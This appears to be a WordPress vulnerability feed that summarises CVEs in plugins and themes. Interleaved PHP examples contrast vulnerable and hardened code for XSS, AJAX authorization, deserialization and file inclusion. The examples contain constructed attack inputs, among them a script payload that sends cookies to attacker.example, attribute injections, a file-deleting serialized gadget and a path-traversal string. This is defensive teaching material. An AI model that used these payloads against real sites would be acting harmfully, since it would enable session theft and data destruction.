Reflected cross-site scripting (XSS) in WPS Visitor Counter WordPress plugin through version 1.4.8 allows remote attackers to inject malicious scripts via the REQUEST_URI parameter, which is output without sanitization in HTML attributes. The vulnerability has a CVSS score of 5.8 and requires user interaction (clicking a crafted link), with exploitation limited primarily to older web browsers due to modern XSS protections. No public exploit code or active exploitation has been identified at the time of analysis.

WordPress PHP XSS
NVD WPScan
CVE-2025-14581
EPSS 0% CVSS 4.3
MEDIUM This Month

The HAPPY Helpdesk Support Ticket System WordPress plugin up to version 1.0.9 allows authenticated attackers with Subscriber-level access to submit replies to arbitrary support tickets by bypassing authorization checks on the 'submit_form_reply' AJAX action. The vulnerability stems from missing capability validation before processing ticket replies, enabling low-privileged users to manipulate the 'happy_topic_id' parameter and interact with tickets they do not own or are not assigned to. While the CVSS score of 4.3 reflects low-to-medium severity with integrity impact only, the EPSS percentile of 13% and absence of evidence of active exploitation suggest this is not an immediate critical priority, though it should be patched to prevent unauthorized ticket interference.

WordPress Authentication Bypass
NVD
CVE-2025-14476
EPSS 0% CVSS 8.8
HIGH This Week

PHP object injection in Doubly Cross Domain Copy Paste plugin (≤1.0.46) allows authenticated attackers with Subscriber-level privileges to execute arbitrary code via deserialized untrusted input from uploaded ZIP archives. Exploitation requires administrators to explicitly enable Subscriber access. Available POP chains enable code execution, file deletion, and sensitive data retrieval. Attack vector requires low privilege (PR:L) authentication with network accessibility and no user interaction. No public exploit identified at time of analysis.

PHP Information Disclosure WordPress +2
NVD
CVE-2025-14447
EPSS 0% CVSS 4.3
MEDIUM This Month

Unauthorized data modification in AnnunciFunebri Impresa WordPress plugin through version 4.7.0 allows authenticated subscribers to reset all plugin options via the missing capability check on annfu_reset_options() function. Attackers with Subscriber-level access can delete all 29 plugin configuration options, reverting the plugin to default state without administrative authorization. No public exploit code or active exploitation has been identified at time of analysis.

Authentication Bypass WordPress
NVD
CVE-2025-14446
EPSS 0% CVSS 5.4
MEDIUM This Month

Popup Builder (Easy Notify Lite) plugin for WordPress versions up to 1.1.37 allows authenticated attackers with Subscriber-level access to reset plugin settings to default values due to missing capability checks in the easynotify_cp_reset() function. The vulnerability requires user authentication and does not grant elevated privileges or information disclosure, resulting in a CVSS score of 5.4 (medium severity). No public exploit code or active exploitation has been identified at time of analysis, though the issue poses moderate risk to WordPress installations relying on plugin configuration integrity.

WordPress Authentication Bypass
NVD
CVE-2025-14440
EPSS 0% CVSS 9.8
CRITICAL Act Now

Authentication bypass in JAY Login & Register plugin for WordPress versions ≤2.4.01 allows unauthenticated remote attackers to impersonate any site user, including administrators, by exploiting flawed cookie validation in the user-switching function. Attackers require only knowledge of target user IDs to gain complete account access without credentials. No public exploit identified at time of analysis.

WordPress Authentication Bypass
NVD
CVE-2025-13403
EPSS 0% CVSS 4.3
MEDIUM This Month

Authenticated attackers with Subscriber-level access can modify tracking settings in the Employee Spotlight WordPress plugin (versions up to 5.1.3) due to missing authorization checks in the employee_spotlight_check_optin() function. The vulnerability allows privilege escalation to perform account integrity modifications that should require administrator approval, affecting all installations of this plugin without patches applied.

Authentication Bypass WordPress
NVD
CVE-2025-14065
EPSS 0% CVSS 4.3
MEDIUM This Month

Simple Bike Rental WordPress plugin versions up to 1.0.6 allow authenticated subscribers to retrieve sensitive customer booking data due to missing capability checks on the 'simpbire_carica_prenotazioni' AJAX action. Attackers with subscriber-level access can exfiltrate personally identifiable information including names, email addresses, and phone numbers from all booking records. CVSS 4.3 reflects the moderate severity of unauthorized information disclosure without requiring administrative access.

Authentication Bypass WordPress
NVD
CVE-2025-14074
EPSS 0% CVSS 4.3
MEDIUM This Month

Authenticated attackers with Subscriber-level access can duplicate arbitrary WordPress posts via the PDF for Contact Form 7 + Drag and Drop Template Builder plugin (versions up to 6.3.3) due to missing capability checks in the 'rednumber_duplicate' function. This allows disclosure of sensitive content including password-protected and private posts. The vulnerability requires authentication but exploits insufficient privilege validation, creating a post enumeration and information disclosure risk for multi-user WordPress installations. No public exploit code or active exploitation has been confirmed at the time of analysis.

Authentication Bypass WordPress
NVD
CVE-2025-10583
EPSS 0% CVSS 3.5
LOW Monitor

WP Fastest Cache Premium plugin versions up to 1.7.4 contain a Server-Side Request Forgery (SSRF) vulnerability in the 'get_server_time_ajax_request' AJAX action that allows authenticated Subscriber-level users to send arbitrary web requests originating from the server, potentially enabling reconnaissance and manipulation of internal services. The free version is unaffected. No public exploit code has been identified at time of analysis, with a very low EPSS score of 0.04% indicating minimal real-world exploitation likelihood despite the authenticated attack vector.

WordPress SSRF Authentication Bypass
NVD
CVE-2025-14467
EPSS 0% CVSS 4.4
MEDIUM This Month

Stored Cross-Site Scripting in WP Job Portal plugin for WordPress up to version 2.4.4 allows authenticated attackers with Editor-level access or higher to inject arbitrary JavaScript into job description fields by exploiting explicit whitelisting of the `<script>` tag in the WPJOBPORTAL_ALLOWED_TAGS configuration. The injected scripts execute when users view affected job listings, enabling session hijacking, credential theft, and other malicious activities. Impact is limited to multi-site installations or sites with unfiltered_html disabled. CVSS score of 4.4 reflects the high privilege requirement (PR:H) and high attack complexity (AC:H), though the vulnerability affects a potentially large number of WordPress installations.

WordPress XSS
NVD
CVE-2025-14354
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery in Resource Library for Logged In Users WordPress plugin (all versions up to 1.5) allows unauthenticated attackers to perform unauthorized administrative actions including creating, editing, and deleting resources and categories by tricking a site administrator into clicking a malicious link. The vulnerability stems from missing nonce validation on multiple administrative functions. With an EPSS score of 0.02% and low real-world exploitation probability despite the CVSS 4.3 score, this represents a lower-priority vulnerability requiring user interaction and administrative privileges on the target site.

WordPress CSRF
NVD
CVE-2025-14344
EPSS 0% CVSS 9.8
CRITICAL Act Now

Arbitrary file deletion in Multi Uploader for Gravity Forms (WordPress plugin ≤1.1.7) allows unauthenticated remote attackers to delete any file on the server through insufficient path validation in the plupload_ajax_delete_file function. Exploitation requires no credentials or user interaction. CVSS 9.8 Critical severity reflects network-accessible attack with high impact to confidentiality, integrity, and availability. Low observed exploitation activity (EPSS 0.37%). No public exploit identified at time of analysis.

Path Traversal WordPress
NVD
CVE-2025-14170
EPSS 0% CVSS 4.3
MEDIUM This Month

Authenticated attackers with WordPress Subscriber-level access and above can modify arbitrary plugin settings in the Vimeo SimpleGallery plugin versions up to 0.2 due to missing authorization checks on the vimeogallery_admin function. The vulnerability allows privilege escalation within WordPress, enabling lower-privileged users to alter plugin configurations they should not have access to. No public exploit code or active exploitation has been identified at the time of analysis.

Authentication Bypass WordPress
NVD
CVE-2025-14064
EPSS 0% CVSS 5.4
MEDIUM This Month

BuddyTask plugin for WordPress versions up to 1.3.0 fails to enforce capability checks on multiple AJAX endpoints, allowing authenticated subscribers and above to view, create, modify, and delete task boards in any BuddyPress group regardless of membership or group privacy settings. The CVSS 5.4 (Medium) rating reflects confidentiality and integrity impacts limited to group task data with low attack complexity and no user interaction required, though the actual organizational risk depends on BuddyPress deployment scope and task board sensitivity.

Authentication Bypass WordPress
NVD
CVE-2025-14032
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Bold Timeline Lite WordPress plugin up to version 1.2.7 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript via the 'title' parameter of the 'bold_timeline_group' shortcode, executing malicious scripts whenever users view affected pages. CVSS 6.4 reflects moderate impact (confidentiality and integrity compromise across trust boundaries); EPSS 0.04% indicates low real-world exploitation probability. No public exploit code or active exploitation confirmed.

WordPress XSS
NVD
CVE-2025-13972
EPSS 0% CVSS 4.9
MEDIUM This Month

Arbitrary file read in WatchTowerHQ WordPress plugin versions up to 3.16.0 allows authenticated administrators with valid access tokens to read sensitive server files via path traversal in the 'wht_download_big_object_origin' parameter. The vulnerability exploits insufficient path validation in the handle_big_object_download_request function, potentially exposing database credentials and authentication keys. No public exploit code or active exploitation has been confirmed at time of analysis.

Path Traversal WordPress
NVD
CVE-2025-13840
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in BUKAZU Search widget plugin for WordPress allows authenticated attackers with Contributor-level access and above to inject arbitrary JavaScript through the 'shortcode' parameter of the 'bukazu_search' shortcode. The vulnerability affects all versions up to and including 3.3.2 and results from insufficient input sanitization and output escaping. Malicious scripts execute in the context of any user accessing affected pages. EPSS score of 0.04% indicates low real-world exploitation probability despite moderate CVSS 6.4 severity.

WordPress XSS
NVD
CVE-2025-13747
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in NewStatPress WordPress plugin versions up to 1.4.3 allows authenticated attackers with contributor-level or higher privileges to inject arbitrary JavaScript into pages via a regex bypass in the nsp_shortcode function. When site visitors access pages containing the injected malicious shortcode attribute, the attacker's script executes in their browsers, enabling session hijacking, credential theft, or malware distribution. No public exploit code has been identified; EPSS score of 0.04% reflects the requirement for authenticated access and user interaction.

WordPress XSS
NVD
CVE-2025-13440
EPSS 0% CVSS 5.3
MEDIUM This Month

Premmerce Wishlist for WooCommerce plugin versions up to 1.1.10 fails to enforce authorization checks on the deleteWishlist() function, allowing authenticated Subscriber-level users to delete arbitrary wishlists belonging to other users. The vulnerability stems from missing capability validation rather than authentication bypass; while the CVSS vector indicates unauthenticated access (PR:N), the description specifies Subscriber-level authentication is required, suggesting the vector may reflect the function's accessibility rather than actual authentication bypass. With EPSS of 0.04% and no public exploit code identified, real-world exploitation risk is minimal despite the authorization flaw.

WordPress Authentication Bypass
NVD
CVE-2025-13320
EPSS 0% CVSS 6.8
MEDIUM This Month

Arbitrary file deletion in WP User Manager plugin versions up to 2.9.12 allows authenticated attackers with Subscriber-level privileges to delete critical files via improper validation of the 'current_user_avatar' parameter when custom avatar functionality is enabled. The vulnerability exploits PHP's filter_input() function's handling of array inputs combined with insufficient path validation, enabling a two-stage attack that can facilitate remote code execution by deleting essential files. No public exploit code has been identified at the time of analysis, though the low EPSS score (0.29%) suggests limited real-world exploitation likelihood despite the moderate CVSS rating.

RCE WordPress
NVD
CVE-2025-13314
EPSS 0% CVSS 5.3
MEDIUM This Month

Unauthenticated attackers can modify plugin settings and create arbitrary filter options in the Filter Plus plugin for WordPress (versions up to 1.1.6) due to missing capability checks on AJAX actions 'filter_save_settings' and 'add_filter_options'. This allows unauthorized data modification with no confidentiality impact but enables attackers to alter product filtering functionality without authentication. The vulnerability has a low EPSS score (0.08%, 23rd percentile) despite network accessibility, indicating limited real-world exploitation likelihood.

WordPress Authentication Bypass
NVD
CVE-2025-12968
EPSS 0% CVSS 8.8
HIGH This Week

Authenticated arbitrary file upload in Infility Global WordPress plugin versions ≤2.14.42 permits remote code execution. The upload_file function accepts spoofed MIME types without verifying file extensions, while import_data lacks capability checks, allowing subscriber-level users to upload malicious files (e.g., PHP webshells) to the server. CVSS:3.1 score 8.8 (High) reflects network-accessible, low-complexity exploitation requiring only low-privilege authentication. No public exploit identified at time of analysis. EPSS 0.35% indicates low observed exploitation activity.

RCE WordPress File Upload
NVD
CVE-2025-12883
EPSS 0% CVSS 5.3
MEDIUM This Month

Unauthenticated payment bypass in Campay Woocommerce Payment Gateway plugin (versions up to 1.2.2) allows remote attackers to mark orders as successfully completed without actually processing payment, directly resulting in financial loss. The vulnerability stems from insufficient transaction validation in the payment processing workflow, enabling attackers to manipulate order status through the payment gateway interface.

Authentication Bypass WordPress
NVD
CVE-2025-12834
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected cross-site scripting (XSS) in Accept Stripe Payments Using Contact Form 7 WordPress plugin versions up to 3.1 allows unauthenticated attackers to inject arbitrary JavaScript via the 'failure_message' parameter due to insufficient input sanitization and output escaping. An attacker can craft a malicious link that, when clicked by a victim, executes JavaScript in the victim's browser session with access to sensitive data or session tokens. No public exploit code or active exploitation has been confirmed at the time of analysis.

WordPress XSS
NVD
CVE-2025-12830
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in Better Elementor Addons plugin for WordPress up to version 1.5.5 allows authenticated attackers with contributor-level or higher privileges to inject arbitrary JavaScript through insufficiently sanitized Slider widget attributes, which executes when any user views the affected page. No public exploit code or active exploitation has been confirmed at time of analysis, but the low attack complexity (AC:L) makes this a practical concern for any WordPress site running a vulnerable plugin version with roles permitted to edit pages.

WordPress XSS
NVD
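
The Stripe/Contact Form 7 entry (reflected, via 'failure_message') and the Better Elementor Addons entry (stored, via widget attributes) are the same bug at two distances: attacker-controlled text reaches the page without being encoded for the context it lands in. The block below is an added example, not code from either plugin: a vulnerable and a hardened renderer for each case in plain PHP, with htmlspecialchars() standing in for WordPress's esc_html()/esc_attr(). The parameter names are taken from the entries; the slide fields and the attacker input are constructed.

```php
<?php
declare(strict_types=1);

// Stand-ins for WordPress's esc_html()/esc_attr(): encode every HTML
// metacharacter, including both quote styles, as UTF-8.
function esc_html_(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}
function esc_attr_(string $s): string {
    return esc_html_($s);
}

// Reflected: a query parameter is echoed straight into the page.
function render_failure_vulnerable(array $get): string {
    $msg = $get['failure_message'] ?? 'Payment failed';
    return "<div class=\"stripe-error\">$msg</div>";
}
function render_failure(array $get): string {
    $msg = $get['failure_message'] ?? 'Payment failed';
    return '<div class="stripe-error">' . esc_html_($msg) . '</div>';
}

// Stored: a widget attribute saved by a contributor is rendered for every
// visitor. Sanitizing at save time is not enough on its own (other code paths
// can write the same option); escape at the point of output, per context.
function render_slide_vulnerable(array $slide): string {
    return "<img src=\"{$slide['image']}\" alt=\"{$slide['caption']}\" data-speed=\"{$slide['speed']}\">";
}
function render_slide(array $slide): string {
    // URL attribute: only http(s) URLs survive; attribute context: esc_attr;
    // numeric attribute: cast instead of escape.
    $src = (filter_var($slide['image'], FILTER_VALIDATE_URL) !== false
            && preg_match('#^https?://#i', $slide['image']) === 1) ? $slide['image'] : '';
    $speed = (int) $slide['speed'];
    return '<img src="' . esc_attr_($src) . '" alt="' . esc_attr_($slide['caption'])
        . '" data-speed="' . $speed . '">';
}

// Constructed attacker input for both cases.
$get   = ['failure_message' => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'];
$slide = [
    'image'   => 'javascript:alert(document.domain)',
    'caption' => '" onerror="alert(1)',
    'speed'   => '1" onload="alert(2)',
];

echo render_failure_vulnerable($get), "\n";   // script element reaches the browser as markup
echo render_failure($get), "\n";              // same text, now inert
echo render_slide_vulnerable($slide), "\n";   // attacker closes the alt and src attributes
echo render_slide($slide), "\n";              // quotes encoded, javascript: URL dropped, speed cast
```

For content that must keep some HTML (post bodies, rich-text widgets), WordPress's wp_kses_post() filters to an allowlist of tags and attributes; for everything else, the rule is esc_html() in text, esc_attr() in attributes, esc_url() in href/src, and wp_json_encode() when passing values into inline scripts.
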
CVE-2025-12783
EPSS 0% CVSS 4.3
MEDIUM This Month

Premmerce Brands for WooCommerce plugin versions up to 1.2.13 allow authenticated attackers with Subscriber-level access to modify brand permalink settings due to a missing capability check in the saveBrandsSettings function. The vulnerability requires only network access and low-privilege authentication, enabling unauthorized data modification of WordPress brand configuration without user interaction.

Authentication Bypass WordPress
NVD
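
Both the Filter Plus entry ('filter_save_settings' and 'add_filter_options' reachable without authentication) and the Premmerce entry (saveBrandsSettings reachable by a Subscriber) come from the same omission: an AJAX handler that never asks whether the caller is allowed to do what it does. The block below is an added example, not code from either plugin. It runs with plain `php` because the WordPress functions it needs (add_action, current_user_can, update_option, wp_create_nonce, wp_verify_nonce) are replaced by minimal stand-ins; the dispatcher mimics how admin-ajax.php routes logged-in requests to wp_ajax_* and anonymous ones to wp_ajax_nopriv_* only. The action names match the Filter Plus entry; the settings fields and requests are constructed.

```php
<?php
declare(strict_types=1);

// Stand-ins for the WordPress functions involved (in a plugin these are WordPress's own).
$GLOBALS['hooks']   = [];
$GLOBALS['options'] = [];
$GLOBALS['caps']    = [];                 // capabilities of the "current user"
function add_action(string $hook, callable $cb): void { $GLOBALS['hooks'][$hook] = $cb; }
function current_user_can(string $cap): bool { return in_array($cap, $GLOBALS['caps'], true); }
function update_option(string $key, mixed $value): void { $GLOBALS['options'][$key] = $value; }
function wp_create_nonce(string $action): string { return hash_hmac('sha256', $action, 'constructed-secret'); }
function wp_verify_nonce(string $nonce, string $action): bool { return hash_equals(wp_create_nonce($action), $nonce); }

// Vulnerable pattern: the action is also registered on the nopriv hook, so
// admin-ajax.php runs it for anonymous requests, and the handler never asks
// who is calling or whether the request came from the plugin's own form.
function save_settings_vulnerable(array $post): array {
    update_option('filter_settings', $post['settings'] ?? []);
    return ['success' => true];
}
add_action('wp_ajax_filter_save_settings',        'save_settings_vulnerable');
add_action('wp_ajax_nopriv_filter_save_settings', 'save_settings_vulnerable');

// Hardened: logged-in hook only, a capability check (authorization), a nonce
// check (CSRF), and the stored value is rebuilt from typed fields rather than
// being whatever array the client sent.
function save_settings(array $post): array {
    if (!current_user_can('manage_options')) {
        return ['success' => false, 'error' => 'forbidden'];
    }
    if (!wp_verify_nonce((string) ($post['_ajax_nonce'] ?? ''), 'filter_save_settings')) {
        return ['success' => false, 'error' => 'bad nonce'];
    }
    $in = is_array($post['settings'] ?? null) ? $post['settings'] : [];
    update_option('filter_settings', [
        'enabled'  => !empty($in['enabled']),
        'per_page' => max(1, min(100, (int) ($in['per_page'] ?? 20))),
    ]);
    return ['success' => true];
}
add_action('wp_ajax_filter_save_settings_fixed', 'save_settings');

// Route like admin-ajax.php: logged-out requests only reach wp_ajax_nopriv_*;
// an unknown action yields the literal response "0".
function dispatch(string $action, bool $logged_in, array $caps, array $post): array|string {
    $GLOBALS['caps'] = $caps;
    $hook = ($logged_in ? 'wp_ajax_' : 'wp_ajax_nopriv_') . $action;
    return isset($GLOBALS['hooks'][$hook]) ? $GLOBALS['hooks'][$hook]($post) : '0';
}

// Constructed requests.
$evil = ['settings' => ['enabled' => false, 'per_page' => 'x', 'extra' => 'injected']];
$good = ['settings' => ['enabled' => '1', 'per_page' => '12'],
         '_ajax_nonce' => wp_create_nonce('filter_save_settings')];

print_r(dispatch('filter_save_settings', false, [], $evil));                               // anonymous, vulnerable handler
print_r(dispatch('filter_save_settings_fixed', false, [], $evil));                         // anonymous, no nopriv hook
print_r(dispatch('filter_save_settings_fixed', true, ['read'], $good));                    // subscriber
print_r(dispatch('filter_save_settings_fixed', true, ['read', 'manage_options'], $evil));  // administrator, no nonce
print_r(dispatch('filter_save_settings_fixed', true, ['read', 'manage_options'], $good));  // administrator with nonce
print_r($GLOBALS['options']['filter_settings']);
```

In real plugin code the two checks are one line each, current_user_can('manage_options') and check_ajax_referer('filter_save_settings', '_ajax_nonce'); the nonce is not a substitute for the capability check, since any logged-in user can obtain a nonce for an action the page hands out.
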
CVE-2025-14293
EPSS 0% CVSS 6.5
MEDIUM This Month

WP Job Portal plugin for WordPress allows authenticated attackers with Subscriber-level access to read arbitrary files on the server through path traversal in the 'downloadCustomUploadedFile' function, potentially exposing sensitive configuration files, database credentials, or other confidential data. The vulnerability affects all versions up to and including 2.4.0, with CVSS 6.5 reflecting the high confidentiality impact but low attack complexity and requirement only for basic authenticated access.

Path Traversal WordPress
NVD
CVE-2025-67570
EPSS 0% CVSS 5.3
MEDIUM This Month

WPForms Google Sheet Connector plugin through version 4.0.0 allows unauthenticated remote attackers to modify data due to missing authorization checks. The flaw enables unauthorized manipulation of form submissions and Google Sheet integrations without any permission validation, affecting WordPress installations using this plugin.

WordPress PHP Authentication Bypass
NVD
CVE-2025-67535
EPSS 0% CVSS 6.5
MEDIUM This Month

Deserialization of untrusted data in WP Maps WordPress plugin versions up to 4.8.6 allows high-privileged authenticated users to inject and instantiate arbitrary PHP objects, potentially leading to code execution or privilege escalation. While the CVSS score of 6.5 reflects high confidentiality and integrity impact, the requirement for administrator-level privileges (PR:H) and user interaction (UI:R) significantly constrains real-world exploitability. EPSS score of 0.04% indicates minimal observed exploitation likelihood despite the vulnerability's technical severity.

WordPress PHP Deserialization
NVD
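
The WP Maps entry is PHP object injection: once attacker-controlled bytes reach unserialize(), any class in the autoloadable code base with a magic method (__wakeup, __destruct, __toString) becomes a gadget. The block below is an added example, not WP Maps code. The gadget class, the payload and the map schema are constructed for the example; the two fixes are real PHP features, the allowed_classes option of unserialize() and JSON as a data-only replacement. It runs stand-alone with plain `php`.

```php
<?php
declare(strict_types=1);

// Constructed gadget class: any class with a __destruct/__wakeup side effect
// that PHP can load at unserialize() time will do.
class TempFileCleaner {
    public function __construct(public string $path) {}
    public function __destruct() {
        // Runs when the object is released, which for unserialize()d data is
        // as soon as the caller drops the return value.
        if (is_file($this->path)) {
            unlink($this->path);
        }
    }
}

// Vulnerable: unserialize() on attacker data instantiates any class named in the blob.
function import_map_vulnerable(string $blob): mixed {
    return unserialize($blob);
}

// Hardened, minimal change: no class may be instantiated; objects in the blob
// become __PHP_Incomplete_Class and no magic method runs.
function import_map(string $blob): mixed {
    return unserialize($blob, ['allowed_classes' => false]);
}

// Hardened, preferable: do not accept PHP serialization at all. Parse JSON and
// rebuild the structure from typed fields.
function import_map_json(string $blob): ?array {
    try {
        $data = json_decode($blob, true, 16, JSON_THROW_ON_ERROR);
    } catch (JsonException) {
        return null;
    }
    if (!is_array($data) || !is_array($data['markers'] ?? null)) {
        return null;
    }
    $markers = [];
    foreach ($data['markers'] as $m) {
        if (!is_array($m) || !is_numeric($m['lat'] ?? null) || !is_numeric($m['lng'] ?? null)) {
            return null;
        }
        $markers[] = ['lat' => (float) $m['lat'], 'lng' => (float) $m['lng'],
                      'title' => (string) ($m['title'] ?? '')];
    }
    return ['markers' => $markers];
}

// Constructed payload: a serialized TempFileCleaner aimed at a file the
// attacker wants gone. Built as a string so no object exists before unserialize().
$victim  = tempnam(sys_get_temp_dir(), 'wpmaps');
$payload = sprintf('O:15:"TempFileCleaner":1:{s:4:"path";s:%d:"%s";}', strlen($victim), $victim);

$obj = import_map($payload);
printf("allowed_classes=false gives %s; file exists: %s\n", get_class($obj), var_export(is_file($victim), true));

import_map_vulnerable($payload);        // return value discarded, destructor fires
printf("plain unserialize; file exists: %s\n", var_export(is_file($victim), true));

var_dump(import_map_json('{"markers":[{"lat":"48.85","lng":2.35,"title":"Paris"}]}'));
var_dump(import_map_json($payload));    // not JSON: rejected
```

Note that WordPress core's own maybe_unserialize() passes data to unserialize() without allowed_classes, so any plugin that stores attacker-influenced serialized strings in options or post meta and reads them back inherits the same exposure; the fix is to never let such strings be serialized PHP in the first place.
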
CVE-2025-63077
EPSS 0% CVSS 4.3
MEDIUM This Month

Happy Addons for Elementor through version 3.20.3 allows authenticated users to access functionality they should not have permission to use due to missing authorization checks on API endpoints or admin functions. The vulnerability requires valid user authentication and results in information disclosure, with a CVSS score of 4.3 and an extremely low EPSS exploitation probability of 0.04%, suggesting minimal real-world attack incentive despite the access control flaw.

WordPress PHP Authentication Bypass
NVD
CVE-2025-63075
EPSS 0% CVSS 6.5
MEDIUM This Month

DOM-based cross-site scripting (XSS) in muffingroup Betheme WordPress theme versions up to 28.2 allows authenticated attackers with low privileges to inject malicious scripts that execute in the context of other users' browsers. The vulnerability requires user interaction (UI:R) and affects the confidentiality, integrity, and availability of affected installations; EPSS exploitation probability is low at 0.04%, and no public exploit code or active exploitation has been confirmed.

WordPress PHP XSS
NVD
CVE-2025-63074
EPSS 0% CVSS 7.5
HIGH This Week

Local File Inclusion in Dream-Theme's The7 WordPress theme (versions prior to 12.8.1.1) allows authenticated attackers with low privileges to read arbitrary server files through improper filename validation in PHP include statements. With a 0.17% EPSS score and no confirmed active exploitation, this represents a moderate risk mainly on sites where low-privileged accounts exist, such as open-registration, membership or shared hosting environments. The 7.5 CVSS score reflects high confidentiality and integrity impact, though exploitation requires high attack complexity and authenticated access.

WordPress PHP Lfi
NVD
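
For an include statement, path containment is not the right fix: include executes PHP and echoes anything outside <?php tags, so even a file that legitimately lives inside the theme directory may be the wrong one to run. The block below is an added example, not The7 code, showing the pattern that removes the problem entirely: the request value is a key into a fixed map of templates, never a path. The template names, directory layout and secret file are constructed, and it runs stand-alone with plain `php`.

```php
<?php
declare(strict_types=1);

// Vulnerable: a request value selects the file to include. include reads any
// file the web server can open; text outside <?php tags is echoed verbatim,
// so a traversal to wp-config.php or /etc/passwd discloses its contents, and
// any .php already on disk (another plugin's, an uploaded one) is executed.
function render_vulnerable(string $template_dir, string $name): void {
    include $template_dir . '/' . $name;
}

// Hardened: the request value is a key, not a path. There is nothing to
// traverse and no file outside the map can be reached.
const TEMPLATES = [
    'portfolio' => 'portfolio.php',
    'team'      => 'team.php',
];
function render(string $template_dir, string $name): bool {
    if (!array_key_exists($name, TEMPLATES)) {
        return false;
    }
    $file = $template_dir . '/' . TEMPLATES[$name];
    if (!is_file($file)) {
        return false;
    }
    include $file;
    return true;
}

// Constructed sandbox: a template directory and a secret one level up.
$root = sys_get_temp_dir() . '/the7-demo-' . bin2hex(random_bytes(4));
mkdir("$root/templates", 0700, true);
file_put_contents("$root/templates/team.php", "<?php echo \"team template rendered\\n\";\n");
file_put_contents("$root/secret.txt", "DB_PASSWORD=hunter2\n");

render_vulnerable("$root/templates", '../secret.txt');   // secret echoed into the page
var_dump(render("$root/templates", '../secret.txt'));     // not a key in TEMPLATES
var_dump(render("$root/templates", 'team'));              // mapped template runs

unlink("$root/templates/team.php"); unlink("$root/secret.txt");
rmdir("$root/templates"); rmdir($root);
```

When the set of templates is not known up front (user-created layouts), build the map at runtime from a directory listing of the theme's own template folder and still look the request value up as a key; that keeps the decision a membership test rather than a string-filtering exercise.
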
CVE-2025-63073
EPSS 0% CVSS 6.5
MEDIUM This Month

DOM-based cross-site scripting in Dream-Theme The7 WordPress theme versions before 12.9.0 allows authenticated users to inject malicious scripts that execute in the context of other users' browsers via improperly sanitized input during web page generation. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting real-world exploitability despite a moderate CVSS score of 6.5. EPSS exploitation probability is low at 0.04%, and no public exploit code or active exploitation has been reported.

WordPress PHP XSS
NVD
CVE-2025-63071
EPSS 0% CVSS 5.3
MEDIUM This Month

Insertion of sensitive information into sent data in the auxin-elements plugin (Shortcodes and extra features for Phlox theme) for WordPress, versions up to 2.17.15, allows unauthenticated remote attackers to retrieve embedded sensitive data from network-accessible responses. The confidentiality impact is rated low, and the EPSS score of 0.04% indicates a low likelihood of exploitation.

WordPress PHP Information Disclosure
NVD
CVE-2025-63068
EPSS 0% CVSS 5.3
MEDIUM This Month

Improper neutralization of HTML tags in sevenspark's Contact Form 7 - Dynamic Text Extension through version 5.0.5 allows unauthenticated remote attackers to inject script content over the network with no user interaction required, with the scored impact limited to information disclosure (confidentiality). The vulnerability is classified as cross-site scripting (XSS); its low EPSS score (0.06%, 18th percentile) suggests limited real-world attack incentive despite the network-accessible attack vector.

WordPress PHP XSS +1
NVD
CVE-2025-63067
EPSS 0% CVSS 4.3
MEDIUM This Month

Porto Theme - Functionality plugin for WordPress (versions before 3.7.3) allows authenticated users to access sensitive information through broken access control, enabling privilege escalation or information disclosure without proper authorization checks. While the vulnerability requires valid WordPress credentials and has low CVSS severity (4.3), the confirmed patch availability and authentication requirement reduce immediate risk. No public exploit code or active exploitation has been identified at the time of analysis.

WordPress PHP Authentication Bypass
NVD
CVE-2025-63066
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored cross-site scripting (XSS) in Porto Theme - Functionality plugin for WordPress allows authenticated users with low privileges to inject malicious scripts into web pages that execute in the browsers of other site visitors. The vulnerability affects Porto Theme - Functionality versions below 3.7.3 and has a low exploitation probability (EPSS 0.01%), but requires user interaction and authenticated access to exploit, limiting immediate risk to well-managed WordPress installations with access controls.

WordPress PHP XSS
NVD
CVE-2025-63065
EPSS 0% CVSS 5.4
MEDIUM This Month

Media Library Assistant WordPress plugin through version 3.29 allows authenticated users to bypass authorization controls and access or modify content they should not have permission to reach via user-controlled keys in access control mechanisms. The vulnerability requires an authenticated user with limited privileges (PR:L) and affects confidentiality and integrity of stored media library data, though with relatively low exploitation probability (EPSS 0.04%) and no confirmed active exploitation at time of analysis.

WordPress PHP Authentication Bypass
NVD
CVE-2025-63058
EPSS 0% CVSS 4.4
MEDIUM This Month

Custom Field Template WordPress plugin through version 2.7.6 exposes sensitive system information to high-privilege local users via embedded data retrieval, allowing administrators to access confidential data they should not have access to. The vulnerability requires high administrative privileges and local access, limiting real-world exploitation risk despite the complete confidentiality impact. EPSS probability is minimal at 0.02%, indicating low likelihood of opportunistic exploitation.

WordPress PHP Information Disclosure
NVD
CVE-2025-63057
EPSS 0% CVSS 8.2
HIGH This Week

DOM-based cross-site scripting in WordPress plugin WP Ultimate Review versions ≤2.3.7 allows remote attackers to execute malicious JavaScript in victims' browsers via crafted input that is improperly sanitized during client-side page rendering. The vulnerability requires user interaction (CVSS UI:R) but no authentication (PR:N), enabling attacks via social engineering or malicious links. Exploitation probability is low (EPSS 0.04%, 14th percentile), with no public exploit identified at time of analysis and no confirmed active exploitation (not in CISA KEV).

WordPress PHP XSS
NVD
CVE-2025-63056
EPSS 0% CVSS 4.3
MEDIUM This Month

Authenticated users can access sensitive contact form data and functionality they should not have permission to view or modify due to missing authorization checks in Contact Form by BestWebSoft plugin versions up to 4.3.6. The vulnerability allows logged-in attackers with low-level privileges to bypass access controls and view contact information or modify form settings with only network access and no additional user interaction required. This is not actively exploited according to available intelligence, though the access control bypass pattern is a common attack vector.

WordPress PHP Authentication Bypass
NVD
CVE-2025-63055
EPSS 0% CVSS 6.5
MEDIUM This Month

